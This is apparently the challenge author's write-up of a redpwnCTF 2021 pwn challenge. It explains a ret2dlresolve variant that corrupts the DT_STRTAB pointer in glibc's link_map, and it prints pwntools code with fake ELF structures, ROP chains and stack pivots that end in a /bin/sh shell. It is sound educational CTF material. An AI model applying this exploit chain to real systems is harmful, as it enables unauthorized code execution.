Table of Contents
redpwnCTF 2021 - devnull-as-a-service (pwn)
by Darin Mao on 7/12/2021
devnull-as-a-service was a pwn challenge I wrote for redpwnCTF 2021. It had a trivial buffer overflow, but the server closed stdout and stderr, which made leaks impossible. In addition, the server was using an unknown glibc version. In this writeup, I will go through the thought process from developing this challenge.
ret2dlresolve
ret2dlresolve is a fairly obscure technique that exploits the symbol resolution process. It was described in detail in this paper and has since been showcased in the 2018 0ctf Qualifier and the Pwny Racing Episode 10.
Symbol Resolution
If a function needs to be resolved (i.e. the binary does not use Full RELRO and the function is being called for the first time), then the PLT will push an offset and jump into the resolver to fill in the relocation and then jump into the real function. There are several ELF structures that facilitate this process:
- the resolver uses the offset pushed by the PLT stub to look up the function’s
ElfW(Rel)
/ElfW(Rela)
from the ELFJMPREL
section - the resolver uses the
r_info
from theElfW(Rel)
/ElfW(Rela)
to look up the function’sElfW(Sym)
from the ELFSYMTAB
section - the resolver uses the
st_name
from theElfW(Sym)
to look up the function’s name from the ELFSTRTAB
section - the resolver uses the
r_info
from theElfW(Rel)
/ElfW(Rela)
to look up the function’svernum
from the ELFVERSYM
section
The full process is detailed in the paper and best understood by reading the glibc source code, so I will not explain it in detail. Most 64-bit binaries (including the one in this challenge) use RELA
rather than REL
, so the relevant structs are Elf64_Rela
and Elf64_Sym
:
typedef struct
{
Elf64_Addr r_offset; /* Address */
Elf64_Xword r_info; /* Relocation type and symbol index */
Elf64_Sxword r_addend; /* Addend */
} Elf64_Rela;
typedef struct
{
Elf64_Word st_name; /* Symbol name (string tbl index) */
unsigned char st_info; /* Symbol type and binding */
unsigned char st_other; /* Symbol visibility */
Elf64_Section st_shndx; /* Section index */
Elf64_Addr st_value; /* Symbol value */
Elf64_Xword st_size; /* Symbol size */
} Elf64_Sym;
Problem on 64-bit with Huge Pages
The most well-known attack that exploits symbol resolution involves creating fake structures in the writable BSS section of the binary, then calling the resolver with an out-of-bounds relocation offset. The reason this works is that there are no bounds checking on the offset pushed by the PLT stub, so we can freely reference any memory relative to the binary ELF sections. Once again, this attack is detailed in the paper so I will not explain it in detail.
The problem with this attack is that _dl_fixup
uses the same array index for both SYMTAB
and VERSYM
. Each element in each of these arrays is a different size (24 and 2 bytes, respectively), so using the same index for both results in vastly different addresses for the structs. In binaries with BSS close to the other sections, this can sometimes work out. However, in 64-bit binaries that use huge pages (so BSS is very far from the other sections), this guarantees a segmentation fault when trying to index VERSYM
if the structs are placed in BSS.
This issue is discussed in appendix A of the paper. At the end, they conclude that “this approach is not viable with small 64 bit ELF binaries that use huge pages.” Unfortunately, this is what the provided binary is.
A New Attack
Ironically, the paper itself contradicts its own conclusion that ret2dlresolve is not viable on such binaries. In section 4.3, they discuss corrupting dynamic loader data in the struct link_map
. glibc uses this structure to describe each loaded object in memory. From reading the glibc source code, it is evident that this structure is used to find the location of all the relavent ELF sections described in the previous section. If we can corrupt this structure, then we can easily change the behavior of symbol resolution.
struct link_map
{
/* These first few members are part of the protocol with the debugger.
This is the same format used in SVR4. */
ElfW(Addr) l_addr; /* Difference between the address in the ELF
file and the addresses in memory. */
char *l_name; /* Absolute file name object was found in. */
ElfW(Dyn) *l_ld; /* Dynamic section of the shared object. */
struct link_map *l_next, *l_prev; /* Chain of loaded objects. */
/* All following members are internal to the dynamic linker.
They may change without notice. */
/* This is an element which is only ever different from a pointer to
the very same copy of this type for ld.so when it is used in more
than one namespace. */
struct link_map *l_real;
/* Number of the namespace this link map belongs to. */
Lmid_t l_ns;
struct libname_list *l_libname;
/* Indexed pointers to dynamic section.
[0,DT_NUM) are indexed by the processor-independent tags.
[DT_NUM,DT_NUM+DT_THISPROCNUM) are indexed by the tag minus DT_LOPROC.
[DT_NUM+DT_THISPROCNUM,DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM) are
indexed by DT_VERSIONTAGIDX(tagvalue).
[DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM,
DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM+DT_EXTRANUM) are indexed by
DT_EXTRATAGIDX(tagvalue).
[DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM+DT_EXTRANUM,
DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM+DT_EXTRANUM+DT_VALNUM) are
indexed by DT_VALTAGIDX(tagvalue) and
[DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM+DT_EXTRANUM+DT_VALNUM,
DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM+DT_EXTRANUM+DT_VALNUM+DT_ADDRNUM)
are indexed by DT_ADDRTAGIDX(tagvalue), see <elf.h>. */
ElfW(Dyn) *l_info[DT_NUM + DT_THISPROCNUM + DT_VERSIONTAGNUM
+ DT_EXTRANUM + DT_VALNUM + DT_ADDRNUM];
/* more struct members below */
Specifically, the symbol resolution process uses many elements from the l_info
array to find the relevant ELF sections. As you can see from the extensive comment, the first few elements are indexed by the dynamic tag numbers.
There is an article from 2014 that describes one possible solution to the huge page problem. They leaked the address of libc and then used it to write a NULL to DT_VERSYM
in link_map
. But the whole point of this technique is that it doesn’t require a leak! If we can get a leak, then we should just use regular ret2libc. In addition, the location of the DT_VERSYM
pointer has shifted around in recent glibc versions. I wanted to do better than this.
Corrupting DT_STRTAB
The attack we’ll use is even easier to do than the typical attack. The only thing we need to corrupt is the pointer to STRTAB
. We can keep all the other ELF structures the same, but point STRTAB
to a new string table that has the name of the function we want to call. This is described in section 4.1 of the paper. From section 4.3:
[ret2dlresolve] can make the
DT_STRTAB
entry of thel_info
field point to a specially-crafted dynamic entry which, in turn, points to a fake dynamic string table. Hence, the attacker can reduce the situation back to the base case presented in Section 4.1.This technique has wider applicability than the one presented in the previous section, since there are no specific constraints, and, in particular, it is applicable also against small 64 bit ELF binaries using huge pages.
I actually developed this attack independently before reading this section. I thought I was pretty clever, but clearly I am not the first to come up with this.
Limitations
The first limitation is that we need to “assume the layout of
a glibc-specific structure (link_map
) to be known.” However, the fact that the server is using glibc is provided in the challenge description so it does not present any problems. As far as I can tell, the members of this structure relevant to the attack have not changed for many years.
The difficulty we must overcome is this: the only pointer (at a known address) to link_map
is near the start of the GOT. We could probably use some ROP gadgets to dereference this address to get the address of link_map
, then call some input function. Unfortunately, the start of the structure contains several libc addresses which we must not corrupt.
With the glibc source and a debugger, we can investigate the link_map
structure in more detail:
0x00007ffff7ffe190│+0x0000: 0x0000000000000000
0x00007ffff7ffe198│+0x0008: 0x00007ffff7ffe730 → 0x0000000000000000
0x00007ffff7ffe1a0│+0x0010: 0x0000000000600e20 → 0x0000000000000001
0x00007ffff7ffe1a8│+0x0018: 0x00007ffff7ffe740 → 0x00007ffff7fcd000 → 0x00010102464c457f
0x00007ffff7ffe1b0│+0x0020: 0x0000000000000000
0x00007ffff7ffe1b8│+0x0028: 0x00007ffff7ffe190 → 0x0000000000000000
0x00007ffff7ffe1c0│+0x0030: 0x0000000000000000
0x00007ffff7ffe1c8│+0x0038: 0x00007ffff7ffe718 → 0x00007ffff7ffe730 → 0x0000000000000000
0x00007ffff7ffe1d0│+0x0040: 0x0000000000000000
0x00007ffff7ffe1d8│+0x0048: 0x0000000000600e20 → 0x0000000000000001
0x00007ffff7ffe1e0│+0x0050: 0x0000000000600f00 → 0x0000000000000002
0x00007ffff7ffe1e8│+0x0058: 0x0000000000600ef0 → 0x0000000000000003
0x00007ffff7ffe1f0│+0x0060: 0x0000000000000000
0x00007ffff7ffe1f8│+0x0068: 0x0000000000600ea0 → 0x0000000000000005
0x00007ffff7ffe200│+0x0070: 0x0000000000600eb0 → 0x0000000000000006
0x00007ffff7ffe208│+0x0078: 0x0000000000600f30 → 0x0000000000000007
0x00007ffff7ffe210│+0x0080: 0x0000000000600f40 → 0x0000000000000008
0x00007ffff7ffe218│+0x0088: 0x0000000000600f50 → 0x0000000000000009
0x00007ffff7ffe220│+0x0090: 0x0000000000600ec0 → 0x000000000000000a
0x00007ffff7ffe228│+0x0098: 0x0000000000600ed0 → 0x000000000000000b
0x00007ffff7ffe230│+0x00a0: 0x0000000000600e30 → 0x000000000000000c
0x00007ffff7ffe238│+0x00a8: 0x0000000000600e40 → 0x000000000000000d
At 0x7ffff7ffe190
we see l_addr
, which is 0 because the binary does not use PIE. Then, there are several libc addresses pointing to various things. Then, at 0x7ffff7ffe1d0
, the important l_info
array referenced in the paper begins. Each element is a pointer to an Elf64_Dyn
dynamic entry, whose first element is the d_tag
dynamic entry type (these are the numbers 1, 2, 3, etc). The element we want to change is the DT_STRTAB
pointer, which is tag 5 at 0x7ffff7ffe1f8
. Note how all the elements around it are addresses pointing to the binary and not randomized (because the binary does not use PIE). If we could somehow input data at an offset from the start of this structure, we could fill in any values we wanted while replacing the DT_STRTAB
pointer.
Upon review, I found that you can actually just overwrite all the libc addresses with NULLs, so I guess this was easier than I thought.
The Challenge
Now, we can investigate the challenge binary itself.
Reversing
The input
function at 0x400757
takes a buffer as an argument and reads 0x80
bytes from stdin into the buffer:
undefined8 input(char *param_1)
{
size_t sVar1;
fgets(param_1,0x80,stdin);
sVar1 = strcspn(param_1,"\n");
param_1[sVar1] = '\0';
return 0;
}
This function is used in the fetch_data
function at 0x4007a2
, which takes a buffer as an argument and reads into the start of the buffer and at the buffer + 0x60
:
undefined8 fetch_data(char *param_1)
{
puts("Send data:");
input(param_1);
puts("Customer ID:");
input(param_1 + 0x60);
return 0;
}
This is then called from main
, using a stack buffer as the argument. However, the stack buffer is only 0x80
bytes long, while reading 0x80
bytes starting at a 0x60
offset is 0xe0
bytes! This gives us a trivial stack overflow, and the binary does not use stack canaries.
Exploit
The critical thing to note here is the disassembly of fetch_data
:
0x4007a2: push rbp
0x4007a3: mov rbp,rsp
0x4007a6: sub rsp,0x10
0x4007aa: mov QWORD PTR [rbp-0x8],rdi
0x4007ae: lea rdi,[rip+0x266] # 0x400a1b
0x4007b5: call 0x400610 <puts@plt>
0x4007ba: mov rax,QWORD PTR [rbp-0x8]
0x4007be: mov rdi,rax
0x4007c1: call 0x400757
0x4007c6: lea rdi,[rip+0x259] # 0x400a26
0x4007cd: call 0x400610 <puts@plt>
0x4007d2: mov rax,QWORD PTR [rbp-0x8]
0x4007d6: add rax,0x60
0x4007da: mov rdi,rax
0x4007dd: call 0x400757
0x4007e2: mov eax,0x0
0x4007e7: leave
0x4007e8: ret
Notice how at 0x4007d2
, a pointer is loaded from rbp-0x8
into rax
, after which 0x60
is added to it. This pointer is then passed to the input
function. This is precisely what we need—a write at an offset from a pointer. All we need to do is place the pointer to link_map
at rbp-0x8
. Fortunately, it is trivial to control rbp
through the stack overflow because rbp
is restored from the stack by leave
before main
returns.
Solution
We need to put some data into BSS. For no particular reason, I chose to place my fake Elf64_Dyn
at exe.bss() + 0x100
. For the sake of clarity, I used Elf64_Dyn
and _U__Elf64_Dyn
from pwnlib.elf.datatypes
, but you could totally just use p64
or something similar to build this manually.
def pack(start, structs, padchr=b'A'):
'''
packs structs starting at an address, padding as needed
'''
data = b''
for addr, struct in structs:
current = start+len(data)
if addr < current:
raise ValueError('Overlapping structs')
data += padchr*(addr-current)
data += bytes(struct)
return data
structs = []
structs_base = exe.bss()+0x100
# offset to fgets (we'll be replacing it with system)
strtab_offset = exe.section('.dynstr').index(b'fgets\x00')
# Elf64_Dyn
dynamic_entry = Elf64_Dyn(d_tag=elf_const.DT_STRTAB)
structs.append((structs_base, dynamic_entry))
# strings
system_addr = structs_base + sizeof(Elf64_Dyn)
system = b'system\x00'
structs.append((system_addr, system))
sh_addr = system_addr + len(system)
sh = b'/bin/sh > /tmp/stdout\x00'
structs.append((sh_addr, sh))
# link them together
dynamic_union = _U__Elf64_Dyn()
dynamic_union.d_ptr = system_addr - strtab_offset
dynamic_entry.d_un = dynamic_union
We also need to figure out what to write to the link_map
. Since our input starts at link_map+0x60
and we want to overwrite the pointer at link_map+0x68
, all we have to do is copy some values.
link_map = p64(0) # DT_HASH
link_map += p64(structs_base) # DT_STRTAB
link_map += p64(0x600eb0) # DT_SYMTAB
Overwriting DT_SYMTAB
is not relevant to the attack, but since fgets
needs a newline to stop and we can’t corrupt this value we’ll overwrite it to stay the same so the newline goes into the next pointer (which doesn’t crash the program when corrupted).
Now that we’ve prepared all the relevant structures, we can start the actual exploit. Since the input size is rather limited, I did a few stack pivots.
# ROP chain #1
# set rbp, input structs, input ROP chain #2, return to fetch_data
log.info('ROP #1')
payload = b'A'*32
payload += p64(0x601010) # put rbp here, right after link_map
payload += p64(pop_rdi)
payload += p64(structs_base) # input structs
payload += p64(func_input)
payload += p64(pop_rdi)
payload += p64(0x601018) # input ROP chain #2
payload += p64(func_input)
payload += p64(pop_rdi)
payload += p64(exe.bss() + 0x800) # input ROP chain #3
payload += p64(func_input)
payload += p64(func_fetch+48) # overwrite link_map
# we're jumping to the middle here
# 1) overwrite link_map+64
# 2) leave; ret at the end
r.sendlineafter('data:\n', 'a')
r.sendlineafter('ID:\n', payload)
This first payload sets rbp
to 0x601010
, calls input
to read all our structures into the right place, then inputs two more ROP chains before jumping to the middle of fetch_data
as described in the previous section.
log.info('Sending structs')
r.sendline(pack(structs_base, structs))
We send all our structures.
pivot = rop.find_gadget(['pop rsp', 'pop r13', 'pop r14', 'pop r15', 'ret']).address
log.info('ROP #2')
payload = p64(pivot)
payload += p64(exe.bss() + 0x800 - 3*8)
r.sendline(payload)
We pivot into ROP #3. I did not want to do a long ROP chain here because we are in the GOT and it would probably mess up some pointers.
log.info('ROP #3')
payload = p64(pop_rdi)
payload += p64(sh_addr)
payload += p64(exe.symbols['fgets']+6)
r.sendline(payload)
We set rdi
to the /bin/sh > /tmp/stdout
string, then call fgets+6
, which bypasses the GOT and calls the resolver for fgets
, which will actually resolve to system
now.
log.info('Overwriting link_map')
r.sendline(link_map)
We overwrite link_map
. Now, everything is set in place. The stack pivots around a few times before calling fgets("/bin/sh > /tmp/stdout")
, which produces a shell.
Additional Thoughts
Several competitors I talked to solved this challenge by using the well-known add dword ptr [rbp - 0x3d], ebx
gadget to change the close
GOT pointer to syscall
. This was actually considered during review long before the CTF, so all the I/O functions were replaced with stdio functions. Unfortunately, at some point after that close
and _exit
were reintroduced, and this did not get caught a second time. Moreover, even with stdio functions and a large POW, the CTF was long enough that competitors could probably use some educated guessing to find the offset to syscall
from a function. I briefly considered releasing a second version of this challenge, but this was the main reason why I decided against it.
Another competitor I talked to used ret2dlresolve, but they mentioned some issues with vernum
, so I suspect they tried to write a NULL there. The location of this pointer has shifted around, but there were only two offsets to try so the large POW did not present any issues.
This was certainly an unusual technique and it took some thought to make it viable. I think using a structure as a buffer was just subtle enough so that it didn’t seem too suspicious or contrived. In the end, this wasn’t even necessary as the libc addresses did not need to be kept intact. I doubt this technique would ever be viable in normal situations, but it was definitely interesting to learn about and investigate.